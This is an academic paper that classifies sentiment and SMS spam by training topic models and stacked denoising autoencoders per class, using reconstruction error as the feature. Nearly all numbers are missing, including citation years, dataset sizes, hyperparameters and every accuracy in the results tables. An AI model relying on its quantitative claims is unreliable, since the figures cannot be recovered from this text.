stacked denoising autoencoders
stacked ae fall under the umbrella of representation learning using deep neural networks. the goal of an ae is to learn an abstract representation of the data presented at its input, such that the input can be reconstructed from that representation. hence the desired output of the ae is the input itself (bengio, ; bourlard & kamp, ; japkowicz, hanson & gluck, ). hinton & zemel ( ) defined an ae as 'a network that uses a set of recognition weights to convert an input vector into a code vector. it then uses a set of generative weights to convert the code vector into an approximate reconstruction of the input vector'. assume we have a network of just two layers: an input (visible) layer of $m$ dimensions $x = (x_1, x_2, \ldots, x_m)$ (e.g. topic modelling features as described in the previous section) and a hidden layer of $n$ nodes $y = (y_1, y_2, \ldots, y_n)$. each node in the hidden layer is connected to all the nodes in the input layer. in the construction phase we compute the hidden representation:

$$y = f(Wx + b)$$

where $W \in \mathbb{R}^{n \times m}$ is a weight matrix and $b$ is a bias term. figure a demonstrates a simplified example of such a network in the construction phase. to assess how well the new $n$-dimensional vector $y$ represents the $m$-dimensional input $x$, we can reconstruct the input layer from the hidden layer (fig. b):

$$x_{rec} = W^{T} y + b$$

where $W^{T}$ is the transpose of $W$. to train the network (i.e. optimise $W$ and $b$) we want to minimise the re between $x$ and $x_{rec}$:

$$\mathrm{RE} = \sum_{i=1}^{n} \lVert d_i - d_i^{rec} \rVert$$

where $n$ is the number of $m$-dimensional input samples, $d_i$ is an input sample fed to the network, and $d_i^{rec}$ is its reconstructed version using eq. ( ). in this article we use the denoising variant of the autoencoder (dae) (vincent et al., ), which corrupts the inputs with added noise in order to enhance the generalisation of the network and hence its representational power. the motivation behind adding this noise factor is to avoid over-fitting, that is, the situation where the network learns to model only the training samples.

figure : demonstration of denoising stacked autoencoders. (a) demonstrates the process of constructing an autoencoder. yellow circles represent an input layer and blue circles represent the hidden layer. (b) demonstrates the reconstruction process of the input from the units in the hidden layer. (c) a stacked denoising autoencoder. each dashed rectangle represents an autoencoder. x represents a connection corrupted by noise.
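a minimal numpy sketch of these three steps (hidden representation, tied-weight reconstruction, and reconstruction error) is given below; the layer sizes and the random stand-in data are illustrative assumptions only.

```python
# single autoencoder with tied weights: y = f(Wx + b), x_rec = W^T y + b',
# and the reconstruction error summed over all input samples.
import numpy as np

rng = np.random.default_rng(1)
m, n_hidden = 20, 8                      # assumed input and hidden layer sizes
W = rng.normal(scale=0.1, size=(n_hidden, m))
b = np.zeros(n_hidden)
b_rec = np.zeros(m)                      # bias of the reconstruction layer

def sigmoid(a):
    return 1.0 / (1.0 + np.exp(-a))

def encode(x):
    return sigmoid(W @ x + b)            # construction phase

def reconstruct(x):
    return W.T @ encode(x) + b_rec       # reconstruction through the tied weights W^T

def reconstruction_error(samples):
    # sum of norms between each sample and its reconstruction
    return sum(np.linalg.norm(d - reconstruct(d)) for d in samples)

X = rng.random((100, m))                 # stand-in for topic-modelling features
print(reconstruction_error(X))
```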
figure c demonstrates the corruption process, which randomly (using isotropic gaussian distributed noise) assigns a weight of zero to the link between two nodes. daes are trained with standard stochastic gradient descent and usually perform significantly better than the standard ae (vincent et al., ). deep architectures facilitate the modelling of complicated structures and patterns efficiently (ngiam et al., ; vincent et al., ). within the framework of dae, the deep network is built by stacking layers of denoising aes that are trained locally, as explained above. the output/hidden layer of each ae plays the role of the input layer of the deeper network (vincent et al., ) (fig. c). as suggested by vincent et al. ( ), sda are usually used for feature extraction or dimensionality reduction followed by a classifier (e.g. svm). alternatively, an additional logistic regression layer is added on top of the encoders, which serves as a supervised deep neural network (hinton, osindero & teh, ; hinton & salakhutdinov, ). the parameters of the whole network are then optimised using standard gradient-based methods, with the original sda playing the role of an unsupervised pre-training model.

overall reconstruction error
here we refer to the re between layers as the local reconstruction error. the re, as defined in eq. ( ), between the input data (e.g. topic modelling features) and the reconstructed features becomes a measure of the overall reconstruction error (ore). alain & bengio ( ) showed that by minimising a particular form of regularised ore, stacked aes capture the density generating the modelled data. this motivates the use of ore as a surrogate measure of the 'goodness' of representation of an input example by the network. a high ore suggests poor representation of the input sample, while a small ore is an indication of an accurate representation of the input. we previously used ore as an indicator for outlier detection (almoubayed et al., ). the novel use of ore here is as the feature extracted from each sda model. as each sda is trained on the output of a topic model associated with one class, samples of other classes will produce a high ore while samples of the same class will generate a low ore. this results in an easily separable (usually linearly separable) feature space, as will be discussed later on. bengio, courville & vincent ( ) and erhan et al. ( ) demonstrated the reasons why unsupervised representational learning methods, including sda, are able to model complex structure in data. the depth of the network, defined by the path between the input features and the output layer, allows for efficient modelling of abstract concepts. the hierarchy of nodes in the network works as a distributed information processing system, which has proved to be beneficial in many application areas (bengio, courville & vincent, ). in the next section we provide further details of how we use this in our approach.

classification approach
we take a supervised classification approach here. data from each class are first transformed from the word/document space to the topics space using the topic modelling approach in "topic modeling". the topic modelling features of the data from both polarities are then used to build the sda models; the result of this process is c sda networks, where c is the number of classes (sentiment polarities). the data from all classes is then passed through these networks to obtain c ores.
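the sketch below illustrates, under simplifying assumptions, the denoising corruption and how a stack of tied-weight encoders can yield an overall reconstruction error for a sample; the masking-style corruption, the layer sizes and the single reconstruction pass are illustrative choices rather than the exact training procedure used in this study.

```python
# denoising corruption plus a stack of tied-weight encoders; the ore of a sample
# is the error between the sample and its reconstruction through the whole stack.
import numpy as np

rng = np.random.default_rng(2)

def corrupt(x, rate=0.3):
    # set a random fraction of the inputs to zero (masking-style corruption)
    mask = rng.random(x.shape) > rate
    return x * mask

class TiedLayer:
    def __init__(self, n_in, n_out):
        self.W = rng.normal(scale=0.1, size=(n_out, n_in))
        self.b = np.zeros(n_out)
        self.b_rec = np.zeros(n_in)
    def encode(self, x):
        return 1.0 / (1.0 + np.exp(-(self.W @ x + self.b)))
    def decode(self, y):
        return self.W.T @ y + self.b_rec

def ore(stack, x):
    # encode through every layer, then decode back in reverse order
    h = x
    for layer in stack:
        h = layer.encode(h)
    for layer in reversed(stack):
        h = layer.decode(h)
    return np.linalg.norm(x - h)

stack = [TiedLayer(20, 24), TiedLayer(24, 32)]   # hidden layers of increasing size (assumed)
x = rng.random(20)
x_noisy = corrupt(x)     # during training each layer sees a corrupted input
print(ore(stack, x))     # ore of the clean sample under this (untrained) stack
```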
a classifier is trained on the ores to predict the class. this process is outlined in fig. . in this example a positive vs. negative polarity prediction is targeted. the input data can come from a wide range of resources (e.g. twitter, blogs, product reviews, structured data). an lda is built separately for the positive and negative polarities (with a preset number of topics). in the next phase two sda networks are built, with different architectures. all the input data (negative or positive) is then passed through the lda and sda phases, and for each sample ore(positive) and ore(negative) are calculated, to be used by a classifier for the final prediction. the motivation behind this approach can be summarised as follows:

- by building a separate sda model per class, the ores are considered representative of how much a document (i.e. input sample) belongs to either polarity. hence the two ores provide easily separable features to the final classifier (bengio, courville & vincent, ).
- the use of topic modelling adds an extra layer of abstraction which helps combine different resources of data, handle adaptive and continuously changing input data (e.g. input from social media), and makes the sda modelling less prone to outliers in the input space.
- the resulting approach requires only two parameters: the number of topics necessary for lda and the architecture of the two sdas. in "results" we analyse carefully the effect of the number of topics on the performance of the whole system. the sda architecture is a much more difficult parameter to tune and usually depends on a skilled network designer.

data sets and experiments
here we focus mainly on sentiment analysis data as an example of a text classification problem. sentiment analysis covers a wide range of tasks/applications. one of the most common tasks is the analysis of product reviews (such as movies) into positive, negative and neutral (lin & he, ; maas et al., ; nguyen et al., ; pang, lee & vaithyanathan, ; wu & pao, ). another popular task is the analysis of social media data and, more specifically, twitter data analysis (bravo-marquez, mendoza & poblete, ; saif et al., ; tang et al., a). in this work we study the application of our method on datasets providing a wide range of data sizes and classification tasks. to unify the analysis under one framework we restrict the tasks to dual polarity problems (i.e. two classes). we limit our selection of datasets to those with manually labelled samples, using average ratings by annotators, to guarantee the reliability of the results reported here. an example of an additional task is the detection of spam sms messages; we used this dataset as evidence of the generalisation of our framework beyond sentiment analysis. table summarises the datasets used, including the classification task performed and the number of samples per polarity. the following is a brief description of these datasets:

- imdb movie review dataset (imdb) (maas et al., ): a , selected reviews from the internet movie database (imdb) archive for sentiment analysis. a maximum of reviews are allowed per movie. the dataset contains an equal number of positive and negative samples. reviews are scored between and ; a sentiment is positive if the imdb rating is ≥ and negative if < . neutral reviews are not included in the dataset.
- movie reviews: sentiment polarity datasets (movie-rev ) (pang, lee & vaithyanathan, ): the data was collected from imdb. only reviews where the author rating was expressed either with stars or a numerical value are used. ratings were automatically extracted and converted into positive, negative, and neutral. however, in their original paper the authors limited the analysis to only positive and negative samples. to avoid bias in the reviews, a limit of reviews per author was allowed.
- movie reviews: sentiment scale datasets (movie-rev ) (pang & lee, ): data was also collected from imdb, from four authors. explicit rating indicators were automatically removed from each document. annotators were asked to rate the reviews and rank them as positive and negative, with ratings averaged per review. only negative and positive reviews at the extremes are kept.
- subjectivity datasets (movie-sub) (pang & lee, ): the dataset looks at subjective vs. objective phrases. for subjective phrases, the authors collected , movie review snippets from www.rottentomatoes.com. to obtain objective data, a collection of , sentences from plot summaries available from imdb was taken.
- umich si —sentiment classification (umich) (umich, ): contains data extracted from social media (blogs) with the goal of classifying the blog posts as positive or negative.

table : datasets.
dataset id | task | no. polarity i | no. polarity ii
imdb | positive vs. negative | , | ,
movie-rev | positive vs. negative | , | ,
movie-rev | positive vs. negative | , | ,
movie-sub | subjective vs. objective | , | ,
umich | positive vs. negative | , | ,
mdsd-b | positive vs. negative | , | ,
mdsd-d | positive vs. negative | , | ,
mdsd-e | positive vs. negative | , | ,
mdsd-k | positive vs. negative | , | ,
sms-spam | spam vs. ham | , |

- multi-domain sentiment dataset (blitzer, dredze & pereira, ): contains product reviews taken from amazon.com from product domains: books (mdsd-b), dvds (mdsd-d), electronics (mdsd-e) and kitchen (mdsd-k). each domain has several thousand reviews. reviews contain star ratings ( – stars), with ratings ≥ labelled positive, ratings ≤ labelled negative, and the rest discarded. after this filtering, , positive and , negative examples per domain are available.
- sms spam collection data set (sms-spam) (almeida, hidalgo & yamakami, ): the data was collected from free or free-for-research sources available online. the sms messages are manually labelled into ham (real messages) and spam (unsolicited messages).

experiment setup
as discussed earlier, there are two parameters to be set for every dataset: (i) the number of topics used in the topic modelling phase and (ii) the sda architecture. for each dataset a range of possible numbers of topics was tested, between and . the architecture of the sda per polarity per dataset was selected experimentally, but all shared an input layer of similar size to the number of topics and two hidden stacked layers of increasing sizes. all units had sigmoid activation functions, the learning rate was set to . , and the corruption rate to % (normally distributed). the learning algorithm ran for epochs.
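a sketch of this setup is shown below, assuming sklearn-style helpers; the candidate numbers of topics, the fold count and the build_model helper are illustrative placeholders rather than the exact values and implementation used in the study.

```python
# grid over the number of topics with k-fold cross-validation; build_model is a
# hypothetical helper that fits the per-polarity lda + sda + classifier pipeline
# for a given number of topics and returns a fitted model with a score() method.
import numpy as np
from sklearn.model_selection import StratifiedKFold

def evaluate(documents, labels, build_model, topic_grid=(10, 20, 50, 100), n_folds=10):
    documents, labels = np.asarray(documents, dtype=object), np.asarray(labels)
    results = {}
    for num_topics in topic_grid:
        fold_scores = []
        skf = StratifiedKFold(n_splits=n_folds, shuffle=True, random_state=0)
        for train_idx, test_idx in skf.split(documents, labels):
            model = build_model(documents[train_idx], labels[train_idx], num_topics)
            fold_scores.append(model.score(documents[test_idx], labels[test_idx]))
        results[num_topics] = float(np.mean(fold_scores))
    return results   # mean cross-validation accuracy per number of topics
```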
another important technical aspect is the classifier, mentioned in "classification approach", that is used to predict the sentiment. before deciding on the best classification approach to take, we look at the separability of the features generated by the combined lda+sda approach compared with the topic modelling features projected onto a two-dimensional space using principal component analysis (pca) or t-distributed stochastic neighbour embedding (t-sne). the corresponding figures show, with scatter plots, the separability of the features for the problems tested here; from left to right they show: (i) the ore generated by the first sda (sda i) vs. the ore generated by the second sda (sda ii); (ii) lda features projected using pca (an unsupervised linear method); (iii) lda features projected onto a two-dimensional space using the first two components of t-sne (an unsupervised non-linear method). the results demonstrate the huge benefit of using sda following the extraction of topic modelling features with lda. the lda features overlap massively between the classes; hence high-dimensional features are required to obtain a reasonable accuracy. however, using the sda-generated ores, with only two features the separability is very high, which makes it easy for even a simple linear classifier to achieve high accuracy (a more formal discussion follows in "discriminability analysis and simulations"). to this end we considered three classification methods (a code sketch of the obc and fda+sda decision rules is given at the end of this subsection):

- ore based classifier (obc): this is a very simple classifier where the ores of both sdas are compared and the sentiment associated with the smaller ore is marked as the predicted sentiment.
- softmax sda (softsda): an additional softmax layer is added on top of the two already trained sda models. the softmax layer transforms the output into probabilities. the sentiment corresponding to the highest probability is the predicted outcome.
- fisher discriminant analysis with sda (fda+sda): instead of adding a softmax layer, fda+sda uses the ores from both sdas to train an fda classifier. fda is particularly suitable for this task given its linear nature.

to better understand the behaviour of our combined approach, we compare it with four other classification methods:

- topic modelling with svm (tm+svm): each document in the dataset is passed through the two lda models for both sentiments (e.g. positive and negative). the outputs of both ldas (i.e. the probabilities of the document belonging to the topics related to each sentiment) are combined to generate a feature vector. the feature vectors are classified using a support vector machine with a gaussian kernel.
- topic modelling with confidence of svms (tm+csvm): in this approach the lda features of one sentiment (s1) are used to build an svm classifier to discriminate between the two sentiments (s1, s2). similarly, another svm classifier is built based on the s2 lda features. the final classification output is decided by the svm classifier with the highest output confidence.
- topic modelling with logistic regression (tm+lr): this is equivalent to tm+svm after replacing the svm classifier by a regularised logistic regression one.
- topic modelling with confidence of lrs (tm+clr): similar to tm+csvm, this approach builds a separate regularised logistic regression classifier per lda model and the confidence in the output is used to make the final decision.

for every dataset we use a -fold cross validation approach to evaluate the accuracy of the system with a variable range of the number of topics and the seven classification strategies.
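as referenced above, the sketch below illustrates the obc and fda+sda decision rules on top of precomputed ores; the toy ore values are illustrative assumptions, and scikit-learn's lineardiscriminantanalysis is used as a stand-in for the fda classifier.

```python
# obc: pick the class whose sda reconstructs the sample best (smallest ore).
# fda+sda: train a linear discriminant on the two-dimensional ore features.
import numpy as np
from sklearn.discriminant_analysis import LinearDiscriminantAnalysis

# toy ore features: column 0 = ore under the positive sda, column 1 = negative sda
ores = np.array([[0.2, 1.1], [0.3, 0.9], [1.2, 0.25], [1.0, 0.3]])
labels = np.array([1, 1, 0, 0])          # 1 = positive, 0 = negative

obc_pred = (ores[:, 0] < ores[:, 1]).astype(int)   # smaller positive-ore -> positive

fda = LinearDiscriminantAnalysis().fit(ores, labels)
fda_pred = fda.predict(ores)

print(obc_pred, fda_pred)
```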
"results" details the results per dataset, with comparisons to the state-of-the-art for every dataset.

baseline methods
to establish a baseline and to compare with state-of-the-art methods, we implemented a list of common methods/approaches from the literature across all the datasets (a sketch of the simplest of these baselines is given at the end of this subsection):

- bagofwords+svm: bag of words is used for feature extraction and svm is the classifier.
- bigram+svm and unigram+svm: bigrams/unigrams are used for feature extraction and svm is used as the classifier.
- lda+svm: one lda model is built for feature extraction using all the training data, completely unsupervised. the number of topics is selected similarly to the approach taken in this paper. svm is then used as the classifier.
- lexical+svm: sentiwordnet (baccianella, esuli & sebastiani, ) is used to extract features that are then used by an svm classifier.
- glove+lstm: the glove english language model, as implemented in spacy (spacy, ), is used together with a long short-term memory (lstm) classifier. the optimisation of the model parameters is done independently for each test dataset, as in hong & fang ( ).

figure : feature separability of the datasets imdb, movie-rev , movie-rev , movie-sub, and sms-spam. blue and orange represent the two polarities in the data. (a, d, g, j and m) show the ore generated by the first sda (sda i) vs. the ore generated by the second sda (sda ii); (b, e, h, k and n) lda features projected using pca; (c, f, i, l and o) lda features projected on a two-dimensional space using the first components of t-sne.

figure : feature separability of the datasets umich, mdsd-b, mdsd-d, mdsd-e, and mdsd-k. blue and orange represent the two polarities in the data. (a, d, g, j and m) show the ore generated by the first sda (sda i) vs. the ore generated by the second sda (sda ii); (b, e, h, k and n) lda features projected using pca; (c, f, i, l and o) lda features projected on a two-dimensional space using the first components of t-sne.

svm is used for most of the baseline methods as it is one of the most commonly used classifiers for methods that do not use language models. linear and gaussian kernels were tested and the choice was based on cross-validation performance. a -fold cross validation is used across the board, including for the baselines and our proposed approaches. the cross validation split is the same for all methods, with the training data used to optimise any parameters of the feature extraction and classification methods. more details and a wider range of comparisons can be found in the cited work per dataset, as explained above.
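as a concrete illustration of the first baseline listed above, the following sketch builds a bag-of-words+svm pipeline evaluated with cross-validation using scikit-learn; the kernel choice, fold count and toy data are assumptions for illustration and not the exact settings used in the experiments.

```python
# bag-of-words features with an svm classifier, evaluated by k-fold cross-validation.
from sklearn.feature_extraction.text import CountVectorizer
from sklearn.model_selection import cross_val_score
from sklearn.pipeline import make_pipeline
from sklearn.svm import SVC

docs = ["a truly great movie", "boring and predictable plot",
        "great acting, great story", "i would not watch it again"]  # toy data
labels = [1, 0, 1, 0]

baseline = make_pipeline(CountVectorizer(), SVC(kernel="rbf"))  # gaussian kernel
scores = cross_val_score(baseline, docs, labels, cv=2)          # small cv for the toy data
print(scores.mean())
```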
results
figure uses a scatter plot to demonstrate the improvement in performance of our approach over the compared baseline methods on almost every dataset studied here, despite the wide range of tasks and challenges offered by these sets. in the figure, most shapes are above the equilibrium line, but a t-test does not show a significant difference (p > . ). glove+lstm seems to be dominant among the other baseline methods. removing it from the comparison set, our sda-based approach is significantly better, with p < . . this strongly suggests that the approach proposed here is comparable to the much more computationally expensive language-modelling-based methods. figure summarises the results achieved by all the classification approaches proposed in this study when applied to all the datasets. in the following we discuss these results in more detail per dataset and compare them to the state-of-the-art. in "discussion" we analyse the reasons behind the advantage of our approach.

figure : a scatter plot comparing, per problem, the best of the compared baseline methods from the literature to our approach. if a dot is below the line, the result in the literature is better; otherwise our approach is better.

imdb movie review dataset
figure a details the accuracies per classification scheme, which are coded in different colours and shapes. it also illustrates the change of cross validation accuracy with an increased number of topics. the methods vary in performance, with fda+sda and obc outperforming the rest and showing consistent results regardless of the number of features. softsda achieves high accuracy, but only when using a small number of topics. the classification methods that bypass sda achieve much lower accuracies even with a low number of features. maas et al. ( ) compared their method (which uses a probabilistic lda-like method) to other common methods in the literature based on a -fold cross validation scheme similar to our validation approach here. another comparison was reported by socher et al. ( ), where they compared with common classifiers including naive bayesian (nb), svm, binb and rnns. table summarises these results.

figure : a colour map visualising the performance of the different methods on the ten datasets. the colour scale on the right of the figure clarifies the colour code, with dark blue indicating low classification accuracy and dark red reflecting high classification accuracy.

figure : detailed results showing the change in accuracy with the number of topics and different classification schemes for the datasets: (a) imdb, (b) movie-rev , (c) movie-rev , (d) movie-sub, (e) umich, and (f) mdsd-b.

movie reviews: sentiment polarity datasets (movie-rev )
the parameter tuning results are presented in fig. b. similar to imdb, fda+sda and obc perform better and more consistently than the other methods on movie-rev . it is interesting to notice the drop in accuracy, for all those methods that do not use sda, with the increased number of topics. table compares our results to those reported in the literature (pang, lee & vaithyanathan, ), with obc outperforming all the other approaches.

movie reviews: sentiment scale datasets (movie-rev )
fda+sda and obc again outperform the other methods for this dataset (fig. c).
however, it is clear that the increased number of topics negatively affected the accuracy of softmaxsda. table shows the superiority of our approach compared with other methods in the literature, which are surveyed in detail by maas et al. ( ) and pang & lee ( ).

subjectivity datasets (movie-sub)
the previous datasets focused on negative vs. positive polarity discrimination. movie-sub, on the other hand, focuses on the task of classifying movie reviews based on their subjectivity. figure d shows the detailed results, while table shows that our approach performs similarly to the best in the literature, with the same pattern of accuracies repeated even with the change of task.

table : imdb results.
method | accuracy (%)
bagofwords+svm | .
bigram+svm | .
unigram+svm | .
lda+svm | .
lexical+svm | .
glove+lstm | .
our approach | .

table : movie-rev results.
method | accuracy (%)
bagofwords+svm | .
bigram+svm | .
unigram+svm | .
lda+svm | .
lexical+svm | .
glove+lstm | .
our approach | .

umich si —sentiment classification (umich)
the data was the core part of a challenge on the machine learning competition website kaggle (san francisco, ca, usa) (umich, ). figure e shows accuracy as high as . % with softmaxsda and topics, which indicates a very high performance for our approach. obc and fda+sda also show above % accuracy, with comparable results to tm+csvm, tm+lr, and tm+clr. the compared accuracy results are detailed in table .

multi-domain sentiment dataset
dang, zhang & chen ( ) used a lexicon-enhanced method to extract lexical features of different sentiments to boost an svm classifier using this dataset. a cross-domain approach was used to study the generalisation of features among different domains using these features (bollegala, weir & carroll, ). the authors also reported the in-domain sentiment analysis accuracy, which is compared to our approach in table . finally, li et al. ( ) used a mixture of lexical features that look at personal/impersonal views to help better separate the features used in polarity classification. the results clearly demonstrate the superiority of our approach compared with the literature, on all the sub-datasets. figures f and a– c present the effect of feature size and classification approach on the results of the datasets, with fda+sda and obc achieving the best results.

table : movie-rev results.
method | accuracy (%)
bagofwords+svm | .
bigram+svm | .
unigram+svm | .
lda+svm | .
lexical+svm | .
glove+lstm | .
our approach | .

table : movie-sub results.
method | accuracy (%)
bagofwords+svm | .
bigram+svm | .
unigram+svm | .
lda+svm | .
lexical+svm | .
glove+lstm | .
our approach | .

sms spam collection data set (sms-spam)
table compares our approach for the problem of sms spam filtering with the state-of-the-art on the same dataset. our approach is on par with the highest accuracy results mentioned in the literature. figure d shows that fda+sda scores the highest accuracy over a wide range of feature numbers. given that the data is imbalanced, it is important to report complementary performance measures. our approach achieved: f-score = . %, precision = . % and recall = . %.

discussion
during the topic modelling phase, lda groups words within the text into topics, with an assigned probability of each word belonging to the topic.
a straightforward feature extraction method could be to use a lexical resource to assign each word within the topic a polarity. a topic is then represented by a weighted average:

$$t_f = \sum_{w} p_w \cdot s_w,$$

where $p_w$ is the probability of word $w$ belonging to topic $t$, $\sum_{w} p_w = 1$, and $s_w$ is the polarity assigned to the word by the lexical resource.

table : umich results.
method | accuracy (%)
bagofwords+svm | .
bigram+svm | .
unigram+svm | .
lda+svm | .
lexical+svm | .
glove+lstm | .
our approach | .

table : multi-domain sentiment results.
method | mdsd-b (%) | mdsd-d (%) | mdsd-e (%) | mdsd-k (%)
bagofwords+svm | . | . | . | .
bigram+svm | . | . | . | .
unigram+svm | . | . | . | .
lda+svm | . | . | . | .
lexical+svm | . | . | . | .
glove+lstm | . | . | . | .
our approach | . | . | . | .

figure : detailed results showing the change in accuracy with the number of topics and different classification schemes for the datasets: (a) mdsd-d, (b) mdsd-e, (c) mdsd-k, and (d) sms-spam.

table : sms spam results.
method | auroc
bagofwords+svm | .
bigram+svm | .
unigram+svm | .
lda+svm | .
lexical+svm | .
glove+lstm | .
our approach | .

figure a shows the positive and negative polarities of positive and negative topics generated when building ldas using the umich data. the data clearly show how well separated the features are, which would make it very easy for a linear classifier to perform well. however, in fig. b the same features for the movie-rev data show a high degree of overlap. this exemplifies the importance of using sda on top of lda to extract hidden complex relationships among the words within the topics of each sentiment. the fact that for some datasets the polarity assigned by a lexical resource generates highly separable features, as in fig. , could explain why on some datasets lexical-based methods outperformed our approach. however, in the general case where these features are not separable enough, the introduction of sda seems to contribute to the enhanced performance. in the case of auto-encoders with a squared re, the ae is equivalent to pca (bengio, courville & vincent, ). however, as we have shown above, pca is unable to clearly separate the sentiments. here we used a tied-weight sda, that is, the decoding weight matrix is the transpose of the encoding matrix, $W' = W^{T}$, which enforces a non-linear model. the use of denoising in sda plays the role of regularisation (bengio, courville & vincent, ). regularisation constrains the representation even when it is overcomplete and makes it insensitive to small random perturbations in the input space. this motivated the increased size of layers with depth, in order to guarantee modelling the data rather than compressing it.

figure : positive and negative polarity assigned by a lexical resource, sentiwordnet (baccianella, esuli & sebastiani, ), to words within the negative and positive topic models. the x-axis represents the negative polarity of a topic, while the y-axis represents the positive polarity. points over the line mean those topics have higher positive polarity, while points under the line carry more negative polarity. (a) word sentiment from positive and negative topic models for umich. (b) the same plot for movie-rev .
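a small example of the weighted-average topic polarity described above is sketched below; the word probabilities and lexicon scores are made-up illustrative values, not output from the models in this study.

```python
# weighted-average polarity of a topic: t_f = sum_w p_w * s_w, where p_w are the
# per-word probabilities of the topic and s_w the lexicon polarity of each word.
def topic_polarity(word_probs, lexicon):
    # words missing from the lexicon are treated as neutral (score 0.0) here
    return sum(p * lexicon.get(word, 0.0) for word, p in word_probs.items())

# illustrative topic (probabilities sum to 1) and lexicon scores in [-1, 1]
word_probs = {"great": 0.4, "boring": 0.3, "plot": 0.2, "actor": 0.1}
lexicon = {"great": 0.9, "boring": -0.8}

print(topic_polarity(word_probs, lexicon))   # 0.36 - 0.24 ~= 0.12
```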
discriminability analysis and simulations
in order to understand why the combined approach of topic modelling and sda works well, we borrow the discriminability index (d′) concept from signal detection theory (green & swets, ; neri, ). assume we have two overlapping distributions representing two classes (fig. a). each distribution is gaussian with mean $\mu_i$ and standard deviation $\sigma_i$. the goal of any learning algorithm is basically to set the decision boundary separating the two distributions in a way that maximises accuracy. discriminability is made easier by either increasing the separation between the two means ($\mu_1$, $\mu_2$) or minimising the spread of the distributions (measured by $\sigma_1$ and $\sigma_2$). d′ is then defined as the ratio between separation and spread (macmillan & creelman, ):

$$d' = \frac{\mu_1 - \mu_2}{\sqrt{\tfrac{1}{2}\left(\sigma_1^{2} + \sigma_2^{2}\right)}}.$$

d′ is a dimensionless statistic, with higher values indicating better discriminability and, as a result, a higher classification accuracy. we hypothesise that our approach outperforms the state of the art due to its ability to increase the discriminability in the output of the two sdas. this is amplified by the use of a class-specific topic model to generate features for the sdas, which in turn are able to accurately model the data at their input to generate highly discriminable features to be classified using a simple linear classifier, as explained above. to test this hypothesis, we simulate the effect of changing d′ on the expected performance of a classifier. the $d'_i$ associated with each sda output is simulated in the range ( – ). the challenge is to map back from $d'_i$ to $\mu_i$ and $\sigma_i$: each value of $d'_i$ can be generated by an infinite number of combinations of $\mu_i$ and $\sigma_i$. to overcome this problem, we use a monte carlo approach to model the joint distribution $p(d', \mu, \sigma)$. it is then possible to obtain acceptable values for $\mu_i$, $\sigma_i$ given the simulated $d'_i$ value. details of a similar approach can be found in neri ( ). to calculate the classification accuracy, for each simulated point ($d'_1$, $d'_2$) synthetic data of , samples is generated from a two-component, two-dimensional gaussian mixture distribution (gmm) with means ($\mu_1$, $\mu_2$), a diagonal covariance matrix ($\sigma_1$, $\sigma_2$), and equal mixing coefficients of . . the generated samples are classified using an fda classifier. the process is repeated times for each point in the simulation space and the average values are reported in fig. b. in the figure a brighter colour indicates higher classification accuracy. it is clear that an increase of d′ on either or both axes results in higher classification accuracy. the black dots show ($d'_1$, $d'_2$) of the output of sda i and sda ii for all the datasets presented above. the white dots are those produced from the output of the topic modelling without sda. the effect sda has on the discriminability of the data, and hence on the accuracy of the overall classifier, is very clear.

figure : (a) schematic description of the concept of d′; (b) simulations of the effect of changing d′ of sda i and d′ of sda ii on the classification accuracy.
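the following sketch illustrates the two ingredients of this analysis, computing d′ for two one-dimensional samples and estimating the accuracy of a linear classifier on synthetic two-dimensional gaussian data; the sample sizes, means and standard deviations are illustrative assumptions, the monte carlo mapping from d′ back to (μ, σ) is omitted, and scikit-learn's lineardiscriminantanalysis stands in for the fda classifier.

```python
# discriminability index d' and a toy version of the accuracy simulation:
# synthetic two-class gaussian data classified with linear discriminant analysis.
import numpy as np
from sklearn.discriminant_analysis import LinearDiscriminantAnalysis

rng = np.random.default_rng(3)

def d_prime(a, b):
    # d' = (mean difference) / sqrt of the average variance of the two samples
    return (np.mean(a) - np.mean(b)) / np.sqrt(0.5 * (np.var(a) + np.var(b)))

def simulated_accuracy(mu1, mu2, sigma1, sigma2, n=10000):
    # two-component, two-dimensional gaussian mixture with diagonal covariance
    x1 = rng.normal(mu1, sigma1, size=(n // 2, 2))
    x2 = rng.normal(mu2, sigma2, size=(n // 2, 2))
    X = np.vstack([x1, x2])
    y = np.array([0] * (n // 2) + [1] * (n // 2))
    clf = LinearDiscriminantAnalysis().fit(X, y)   # stand-in for the fda classifier
    return clf.score(X, y)

print(d_prime(rng.normal(1.0, 1.0, 5000), rng.normal(0.0, 1.0, 5000)))
print(simulated_accuracy(mu1=(0.0, 0.0), mu2=(1.5, 1.5), sigma1=1.0, sigma2=1.0))
```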
these findings are very important in demonstrating the effect sda has when combined with topic modelling in the approach described above. they suggest that lda trained on data from one class helps suppress the other class(es), and sda is then able to model the inter-dependencies in a way that increases discriminability. this suggests that the approach can be used in other areas beyond sentiment analysis and for a larger number of classes.

conclusion
this work presented a novel framework for text classification that combines topic modelling with deep stacked ae to generate highly separable features that are then easily classified using a simple linear classifier. the approach transforms the sentiment analysis problem from the space of words (used in approaches such as bag of words and lexical sentiment corpora) to the topics space. this is especially useful as it incorporates the context information within the mixture model of topics (using lda). to model the class-specific information, sda plays the role of finding structural correlations among topics without any strong assumption on the model. this combination of feature extraction methods results in a semi-automatic approach with minimum feature engineering and few parameters to tune. to demonstrate the effectiveness of our approach we used benchmark datasets for various tasks in sentiment analysis, covering a wide range of data sizes and class bias. tasks included negative/positive product and movie reviews, subjectivity of movie reviews, and spam filtering. as presented in the previous section, our approach achieves significantly higher accuracies than the best reported in the literature for most of the tested datasets. this, and the fact that it requires very little feature engineering, makes the approach very attractive for various applications in many domains. lda allows for adaptive learning (a feature of gibbs sampling and variational bayesian methods), which is a very useful feature for big data and streaming applications. sdas can also be trained in an online manner, making the whole system adaptive, especially in areas such as micro-blogging and social media. the work presented here is designed to provide a framework for text classification tasks. every component in this framework could be replaced by another method. lda could, for example, be replaced by tsm or jst. sda could be replaced by other representational learning algorithms, including restricted boltzmann machines (rbm) or recursive neural networks (rnn). the framework can also be easily extended to multiple class problems using one-vs-one or one-vs-all methods.

the discriminability analysis presented here provides an explanation of why sda and lda work well within the presented framework. the analysis further supports the claims made in this paper that sda is able to model the complex structure of class-specific topics and separate them to achieve high classification accuracy.

additional information and declarations

funding
the work was funded by epsrc uk. the funders had no role in study design, data collection and analysis, decision to publish, or preparation of the manuscript.

grant disclosures
the following grant information was disclosed by the authors: epsrc uk.

competing interests
the authors declare that they have no competing interests.
author contributions
- noura al moubayed conceived and designed the experiments, performed the experiments, analysed the data, performed the computation work, prepared figures and/or tables, authored or reviewed drafts of the paper, and approved the final draft.
- stephen mcgough conceived and designed the experiments, authored or reviewed drafts of the paper, and approved the final draft.
